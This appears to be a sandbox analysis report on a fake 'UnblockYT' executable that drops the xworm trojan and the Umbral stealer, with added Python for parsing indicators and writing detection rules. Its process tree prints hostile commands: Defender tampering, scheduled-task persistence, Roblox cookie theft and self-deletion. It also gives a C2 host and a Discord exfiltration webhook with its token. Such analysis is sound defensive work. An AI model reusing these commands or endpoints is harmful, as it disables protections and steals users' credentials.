Analysis

  • max time kernel
    300s
  • max time network
    289s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240705-en locale:en-us os:windows7-x64 system
  • submitted
    05-08-2024 08:58

General

  • Target

    UnblockYT .sfx.exe

  • Size

    2.0MB

  • MD5

    d916c09287b75c30e207a4613a75e3b7

  • SHA1

    dfb8fb428e5b2cef3163b1de09bf88a71c5e84a5

  • SHA256

    b64d7ddeb7362ca3377c16143d699256c78a4c6340d4d79bf0f092d538823bd0

  • SHA512

    3beab1703dc0d0f931baf2cb7822b5a412867a3194184fca99f6be2c386048524c3e9e2e5b957f1f8fe12a0af4190fba41592fae68ce1623c81a65069e1ac8c4

  • SSDEEP

    49152:1Djlabwz9uJm2SnlA3tc4F7VP0q8bJQ555Yw6hzAdxopxRL:ZqwEKeTv0q8bG55v3q5

Malware Config

Extracted

Family

xworm

C2

connection-arizona.gl.at.ply.gg:65211

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1249007779272982548/JNrfEnOEk9T5Uy5CL9Eht-UTb749aNfK8MBYreIOGClZHBASVuqcHQsf1pCugOHPrnQu
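
The two indicators above carry more than a blocklist entry. The xworm C2 is a playit.gg tunnel hostname (ply.gg), so the address defenders see belongs to the tunnel provider rather than to the operator; the Umbral exfiltration channel is a Discord webhook whose numeric ID is a Discord snowflake and therefore encodes when the webhook was created. The Python below is an added example (not from the report, nor from the xworm or Umbral code) that parses both indicators, flags tunnel-service suffixes from a short illustrative list of my own, decodes the webhook creation time from the snowflake, and defangs the values for sharing. Standard library only; it makes no network requests.

```python
"""Parse the extracted C2 indicators and decode the Discord webhook ID.

Added example, not part of the sandbox report or of the xworm/umbral code.
Standard library only; nothing here touches the network.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
from urllib.parse import urlparse

# Indicators copied from the Malware Config section of this report.
XWORM_C2 = "connection-arizona.gl.at.ply.gg:65211"
UMBRAL_WEBHOOK = ("https://discord.com/api/webhooks/1249007779272982548/"
                  "JNrfEnOEk9T5Uy5CL9Eht-UTb749aNfK8MBYreIOGClZHBASVuqcHQsf1pCugOHPrnQu")

# Discord snowflake: bits 63..22 are milliseconds since 2015-01-01T00:00:00Z.
DISCORD_EPOCH_MS = 1_420_070_400_000

# Suffixes handed out by reverse-tunnel services (playit.gg uses *.ply.gg).
# Illustrative list chosen for this example, not an authoritative feed.
TUNNEL_SUFFIXES = (".ply.gg", ".ngrok.io", ".ngrok-free.app", ".trycloudflare.com")

DISCORD_HOSTS = {"discord.com", "discordapp.com", "ptb.discord.com", "canary.discord.com"}


@dataclass(frozen=True)
class HostPort:
    host: str
    port: int
    tunnelled: bool  # host sits under a known tunnel-service suffix


@dataclass(frozen=True)
class Webhook:
    webhook_id: int
    token: str
    created: datetime  # derived from the snowflake, UTC


def parse_host_port(indicator: str) -> HostPort:
    """Split 'host:port', validate the port and flag tunnel-service hostnames."""
    host, sep, port = indicator.rpartition(":")
    if not sep or not host or not port.isdigit() or not 0 < int(port) < 65536:
        raise ValueError(f"not a host:port indicator: {indicator!r}")
    host = host.lower()
    return HostPort(host, int(port), host.endswith(TUNNEL_SUFFIXES))


def snowflake_to_datetime(snowflake: int) -> datetime:
    """Creation time encoded in a Discord snowflake ID."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def parse_discord_webhook(url: str) -> Webhook:
    """Validate a Discord webhook URL and split it into ID, token and creation time."""
    u = urlparse(url)
    if u.scheme != "https" or u.netloc.lower() not in DISCORD_HOSTS:
        raise ValueError(f"not a Discord webhook host: {u.netloc!r}")
    parts = u.path.strip("/").split("/")
    if len(parts) != 4 or parts[:2] != ["api", "webhooks"] or not parts[2].isdigit():
        raise ValueError(f"unexpected webhook path: {u.path!r}")
    webhook_id = int(parts[2])
    return Webhook(webhook_id, parts[3], snowflake_to_datetime(webhook_id))


def defang(indicator: str) -> str:
    """Neutralise an indicator so it cannot be clicked or auto-linked when shared."""
    return (indicator.replace("https://", "hxxps://")
                     .replace("http://", "hxxp://")
                     .replace(".", "[.]"))


def summarise() -> dict:
    """Analyst-facing summary of both indicators."""
    c2 = parse_host_port(XWORM_C2)
    wh = parse_discord_webhook(UMBRAL_WEBHOOK)
    return {
        "xworm_c2": defang(XWORM_C2),
        "xworm_c2_port": c2.port,
        "xworm_c2_behind_tunnel_service": c2.tunnelled,
        "umbral_webhook": defang(UMBRAL_WEBHOOK),
        "umbral_webhook_id": wh.webhook_id,
        "umbral_webhook_created_utc": wh.created.isoformat(timespec="seconds"),
    }


if __name__ == "__main__":
    for key, value in summarise().items():
        print(f"{key}: {value}")
```

Decoding the snowflake dates this webhook to 2024-06-08, roughly two months before the submission recorded at the top of this report; a recently created webhook is typical of a freshly built stealer campaign, and the ID is the value to quote when reporting the webhook to Discord for takedown. The tunnel-suffix check is a hint, not a verdict: legitimate developers use the same services, so treat a hit as a reason to look at the destination port and the process that opened it.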

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 12 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Uses the powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar secrets.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 10 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\UnblockYT .sfx.exe
    "C:\Users\Admin\AppData\Local\Temp\UnblockYT .sfx.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2544
    • C:\Users\Admin\AppData\Roaming\UnblockYT .exe
      "C:\Users\Admin\AppData\Roaming\UnblockYT .exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
        "C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Users\Admin\AppData\Roaming\YTunblock.exe
          "C:\Users\Admin\AppData\Roaming\YTunblock.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2612
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\YTunblock.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1888
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YTunblock.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1224
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1336
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2784
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:776
          • C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe
            "C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe"
            5⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2676
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1504
            • C:\Windows\system32\attrib.exe
              "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe"
              6⤵
              • Views/modifies file attributes
              PID:1608
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2388
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2736
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2892
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2780
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" os get Caption
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1900
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" computersystem get totalphysicalmemory
              6⤵
              PID:1884
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              6⤵
              PID:2104
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1896
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              6⤵
              • Detects videocard installed
              PID:1372
            • C:\Windows\system32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe" && pause
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              PID:2960
              • C:\Windows\system32\PING.EXE
                ping localhost
                7⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:1200
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Roaming\ .bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\system32\timeout.exe
          timeout /t 1 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:2856
        • C:\Windows\system32\timeout.exe
          timeout /t 2 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:2880
        • C:\Windows\system32\timeout.exe
          timeout /t 3 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:1884
        • C:\Windows\system32\timeout.exe
          timeout /t 1 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:1592
        • C:\Windows\system32\timeout.exe
          timeout /t 1 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:1892
        • C:\Windows\system32\timeout.exe
          timeout /t 1 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:1032
        • C:\Windows\system32\timeout.exe
          timeout /t 1 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:2596
        • C:\Windows\system32\timeout.exe
          timeout /t 3 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:444
        • C:\Windows\system32\timeout.exe
          timeout /t 3 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:2456
        • C:\Windows\system32\timeout.exe
          timeout /t 3 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:1664
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {AAA98D99-543B-4986-A3A9-6A2834AA30EA} S-1-5-21-3502430532-24693940-2469786940-1000:PSBQWFYT\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1556
    • C:\Users\Admin\AppData\Roaming\svchost.exe
      C:\Users\Admin\AppData\Roaming\svchost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2976
    • C:\Users\Admin\AppData\Roaming\svchost.exe
      C:\Users\Admin\AppData\Roaming\svchost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:3024
    • C:\Users\Admin\AppData\Roaming\svchost.exe
      C:\Users\Admin\AppData\Roaming\svchost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:1888
    • C:\Users\Admin\AppData\Roaming\svchost.exe
      C:\Users\Admin\AppData\Roaming\svchost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:2348
    • C:\Users\Admin\AppData\Roaming\svchost.exe
      C:\Users\Admin\AppData\Roaming\svchost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:2796
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2788
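
The command lines recorded in the process tree above are a compact catalogue of this sample's tradecraft: Defender exclusions and feature toggles through Add-MpPreference and Set-MpPreference, a scheduled task that re-launches %AppData%\svchost.exe every minute with highest run level, attrib +h +s on the dropped Umbral binary, hardware fingerprinting through wmic, a Roblox session cookie read from the registry, and ping-then-del self-removal. The Python below is an added example (not part of the sandbox report and not code from either malware family) that runs a small rule set over Sysmon-style process-creation records. The records are constructed from the command lines above, with the PIDs as logged, plus one benign PowerShell invocation as a control; the pipe-delimited record format, the field names, the rule names and the ATT&CK mapping are my own choices for the example.

```python
"""Match process-creation records against the behaviours seen in this report.

Added example; not part of the sandbox report or of the xworm/umbral code.
Records below are constructed from the Processes section (PIDs as logged)
plus one benign control. The 'pid|image|cmdline' layout stands in for a
Sysmon Event ID 1 export; nothing here reads a real event log.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str  # ATT&CK technique the behaviour maps to
    image: str      # regex over the executable path
    cmdline: str    # regex over the command line


RULES = [
    Rule("defender_exclusion_added", "T1562.001", r"powershell\.exe$",
         r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\b"),
    Rule("defender_feature_disabled", "T1562.001", r"powershell\.exe$",
         r"Set-MpPreference\b.*-Disable\w+\s+\$true"),
    Rule("schtask_every_minute_user_path", "T1053.005", r"schtasks\.exe$",
         r'/sc\s+minute\b.*/tr\s+"?[^"]*\\(AppData|Temp)\\'),
    Rule("hide_dropped_file", "T1564.001", r"attrib\.exe$",
         r"\+h\b.*\+s\b|\+s\b.*\+h\b"),
    Rule("hwid_fingerprint", "T1082", r"wmic\.exe$",
         r"csproduct\s+get\s+uuid"),
    Rule("roblox_cookie_from_registry", "T1552.002", r"powershell\.exe$",
         r"\.ROBLOSECURITY\b"),
    Rule("self_delete_via_ping", "T1070.004", r"cmd\.exe$",
         r"\bping\b.*&&\s*del\b"),
]

# Names that only legitimately run from the Windows system directories.
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def masquerades_as_system_binary(image: str) -> bool:
    """True for a system-binary name running outside System32/SysWOW64."""
    path = image.lower()
    name = path.rsplit("\\", 1)[-1]
    return name in SYSTEM_BINARIES and not path.startswith(SYSTEM_DIRS)


def match_rules(event: dict) -> list:
    """Return (rule name, technique) pairs that fire on one record."""
    hits = [(r.name, r.technique) for r in RULES
            if re.search(r.image, event["image"], re.I)
            and re.search(r.cmdline, event["cmdline"], re.I)]
    if masquerades_as_system_binary(event["image"]):
        hits.append(("system_binary_name_outside_windows_dir", "T1036.005"))
    return hits


def parse_events(text: str) -> list:
    """Parse 'pid|image|cmdline' lines; the command line may itself contain spaces."""
    events = []
    for line in text.strip().splitlines():
        pid, image, cmdline = line.split("|", 2)
        events.append({"pid": int(pid), "image": image, "cmdline": cmdline})
    return events


def scan(events: list) -> dict:
    """Map PID -> hits for every record that fired at least one rule."""
    findings = {}
    for ev in events:
        hits = match_rules(ev)
        if hits:
            findings[ev["pid"]] = hits
    return findings


# Constructed from the process tree above; PID 4242 is a benign control I added.
RAW_EVENTS = r"""
1888|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\YTunblock.exe'
776|C:\Windows\SysWOW64\schtasks.exe|"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
1608|C:\Windows\system32\attrib.exe|"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe"
2736|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
2892|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
2780|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
1504|C:\Windows\System32\Wbem\wmic.exe|"wmic.exe" csproduct get uuid
2960|C:\Windows\system32\cmd.exe|"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe" && pause
2976|C:\Users\Admin\AppData\Roaming\svchost.exe|C:\Users\Admin\AppData\Roaming\svchost.exe
4242|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-Process
"""

if __name__ == "__main__":
    for pid, hits in scan(parse_events(RAW_EVENTS)).items():
        print(pid, hits)
```

Two design points. The rules deliberately do not key on `-ExecutionPolicy Bypass`, which is common in legitimate administration scripts; the exclusion cmdlet itself is the signal, and a tighter version would also require the exclusion path to sit under a user-writable directory. The Roblox rule matches the `.ROBLOSECURITY` value name regardless of hive prefix, so the `HKLN:` variant logged above, which names no valid PowerShell drive and can only have failed, is still caught. Two caveats for triage: the Defender cmdlets used here are not part of Windows 7, the platform this run used, so the tampering was almost certainly ineffective in the sandbox even though it is the intended behaviour on Windows 10/11; and on current Windows builds Tamper Protection blocks these Set-MpPreference changes unless it has been turned off.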

Network

MITRE ATT&CK Enterprise v15

Downloads

      • C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe

        Filesize

        229KB

        MD5

        4bc09295bb5cf98d5e3df87fc1a2ed72

        SHA1

        c59cbee06c84683e59788df06c97f642ac1a402b

        SHA256

        9a7ba8617514eec0bc69b27fe7f105b8c5be4de6ae8e92be724c6d27b3f857ea

        SHA512

        a2643afeeb9e5e65ebe9a9e342b4a0d8def545ed2cb1d2e6ed76a3d6d87ed6b4858b316df1e31d70225c2a03557e14e1badb3cc74942f9f27f15285f19c77c63

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        feb5f597269efa8853b2c5ee6b53d9c3

        SHA1

        815490369a8ef92f4a607e2de60be68b2685544e

        SHA256

        89b6399413091f8bb64483d2d8a35b416afbbe725880dd911b7c85df1d6b539e

        SHA512

        d0f559c138cfa96100d0ad05d15aa432f725a8899ef1f4b2365c333d608d9663e92033dd3c6901346748c0a5c5a435446399fcffa3ac386d69d8ef0824e00584

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

        Filesize

        7KB

        MD5

        5f1d19888c3ba95395a712d0381f9dbd

        SHA1

        36cf56c0025ba61b8c5043f20144ca8dc4859f66

        SHA256

        d3fb748b46f4dae8218ec7e6216174e87b045b4c839175cb04dd7bde4c1ceba9

        SHA512

        a3dec28b51a2d4c635e54496de917534f87b3a8b36cd82feeaa1743702aa469eda7138b4e028d1721dc18eba5dc87c32b877deca86bafcdc8fd04a03086820ed

      • C:\Users\Admin\AppData\Roaming\YTunblock.exe

        Filesize

        1.2MB

        MD5

        5c130e0ea8b936a34372663dd763f722

        SHA1

        cbb1efd33b28851682ae3f9699c79ffe705c780d

        SHA256

        262edf6e52c54494f19dd41c37307c6fb85bbd37820fb10df68a01f2f2fef644

        SHA512

        a4e7bc8a551507648651740ce87388929ab9c7c3c4997ba0c1fb15116a6e433e1660f11a65886b0ed7552264df74ce055a84fad4c96a057fb0b4c4c37b149f2e

      • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe

        Filesize

        1.6MB

        MD5

        10aefe8560bf4e437d2f47bd469a59ff

        SHA1

        57c72df8758b6afcaa47d3dd9b46009b0d68f7e5

        SHA256

        56a5db69837d84f160c2ad3fd7c46ab658df9979d3ba34834a8b514e63626f11

        SHA512

        d8f6fd44f11b140c36bfa1d9d732f31d5bc308887fcce3605391ce30fa2fa360379d5c47e7ea2bb9ef5d7dea5b8f82bdd0d7e643a7d7d9de37b478ac7f43646d

      • C:\Users\Admin\AppData\Roaming\ .bat

        Filesize

        1KB

        MD5

        5807f01368bda72ebd943e8755fa2e0c

        SHA1

        f42940149bf0e256b14343c87f750c6cdac8ae72

        SHA256

        9c7be36ede7526e5d10e8af969dbf8d2b242ab9c52c107e9f42200fb0ee2ce2a

        SHA512

        31612135b0981a500b8b09c72809da0e66e0633885270aeb26de02c26dbdbb4d8b27299349cc352558a3c9ec18eda6840e380ca99473fde3882cbbe3e02dc107

      • \Users\Admin\AppData\Roaming\UnblockYT .exe

        Filesize

        1.8MB

        MD5

        ddf02dfa6df9ee4e157d675e55a055c7

        SHA1

        d6fc1b85378c9ffae39dfaa0fc3a6876193ce933

        SHA256

        6ec4b872cd4c8aa6859574fb02187bda31fb71cbace5026c9e0d89e078b61730

        SHA512

        79b32c992e1adea1700fac6e87fe1dac0562fc6ff927f16b7464fa32793ff41cc9c1ad9caf323a87213f0cda7c32d29e155e1a5eed8f18d09819d13515b1a4a0

      • memory/1888-148-0x0000000000040000-0x00000000003F2000-memory.dmp

        Filesize

        3.7MB

      • memory/1888-145-0x0000000000040000-0x00000000003F2000-memory.dmp

        Filesize

        3.7MB

      • memory/1888-144-0x0000000000040000-0x00000000003F2000-memory.dmp

        Filesize

        3.7MB

      • memory/2348-159-0x0000000000990000-0x0000000000D42000-memory.dmp

        Filesize

        3.7MB

      • memory/2348-156-0x0000000000990000-0x0000000000D42000-memory.dmp

        Filesize

        3.7MB

      • memory/2348-155-0x0000000000990000-0x0000000000D42000-memory.dmp

        Filesize

        3.7MB

      • memory/2388-94-0x000000001B630000-0x000000001B912000-memory.dmp

        Filesize

        2.9MB

      • memory/2388-95-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

        Filesize

        32KB

      • memory/2612-73-0x0000000000A50000-0x0000000000E02000-memory.dmp

        Filesize

        3.7MB

      • memory/2612-80-0x0000000002660000-0x0000000002670000-memory.dmp

        Filesize

        64KB

      • memory/2612-43-0x0000000000A50000-0x0000000000E02000-memory.dmp

        Filesize

        3.7MB

      • memory/2612-45-0x0000000000A50000-0x0000000000E02000-memory.dmp

        Filesize

        3.7MB

      • memory/2612-68-0x0000000002660000-0x0000000002670000-memory.dmp

        Filesize

        64KB

      • memory/2676-88-0x0000000000E20000-0x0000000000E60000-memory.dmp

        Filesize

        256KB

      • memory/2736-101-0x000000001B580000-0x000000001B862000-memory.dmp

        Filesize

        2.9MB

      • memory/2736-102-0x00000000027F0000-0x00000000027F8000-memory.dmp

        Filesize

        32KB

      • memory/2796-166-0x0000000000350000-0x0000000000702000-memory.dmp

        Filesize

        3.7MB

      • memory/2796-167-0x0000000000350000-0x0000000000702000-memory.dmp

        Filesize

        3.7MB

      • memory/2796-170-0x0000000000350000-0x0000000000702000-memory.dmp

        Filesize

        3.7MB

      • memory/2976-75-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

      • memory/2976-74-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

      • memory/2976-78-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

      • memory/3024-137-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

      • memory/3024-134-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

      • memory/3024-133-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB